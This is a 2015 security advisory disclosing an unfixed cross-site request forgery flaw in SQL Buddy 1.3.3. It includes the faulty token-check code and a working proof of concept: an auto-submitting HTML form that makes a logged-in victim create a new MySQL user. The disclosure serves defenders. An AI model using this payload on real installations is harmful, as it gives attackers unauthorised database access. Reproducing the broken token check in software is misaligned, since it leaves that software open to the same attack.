SQL Buddy 1.3.3 Cross Site Request Forgery

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: SQL Buddy 1.3.3  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Contact: [email protected]  
Vulnerability Type: CSRF  
Remote Exploitable: Yes  
Reported to vendor: 08/18/2015  
Disclosed to public: 10/07/2015  
Release mode: Full Disclosure  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Vulnerability Description  
  
None of the forms of SQL Buddy 1.3.3 have proper CSRF protection, which means  
that an attacker can perform actions for the victim if the victim visits an  
attacker controlled site while logged in.  
  
While SQL Buddy does have CSRF protection, it does not work properly. If a CSRF  
token is sumbitted, it has to be correct. However, if no token is submitted,  
the check is passed as well.  
  
3. Proof of Concept  
  
Insert a new MySQL user:  
  
  
<form name="myform" method="post" action="http://localhost/sqlbuddy/query.php?ajaxRequest=2807&db=foo" >  
<input type="hidden" name="query" value="CREATE USER 'injected'@'localhost' IDENTIFIED BY 'injected';">  
</form>  
<script>document.myform.submit();</script>  
  
4. Code  
  
  
functions.php:215  
function validateRequest() {  
global $requestKey;  
if (isset($_GET['requestKey']) && $_GET['requestKey'] != $requestKey) {  
return false;  
}  
return true;  
}  
  
5. Solution  
  
This issue was not fixed by the vendor.  
  
6. Report Timeline  
  
08/18/2015 Informed Vendor about Issue (no reply)  
09/16/2015 Reminded Vendor of release date (no reply)  
10/07/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/SQL-Buddy-133-CSRF-59.html  
  
  
`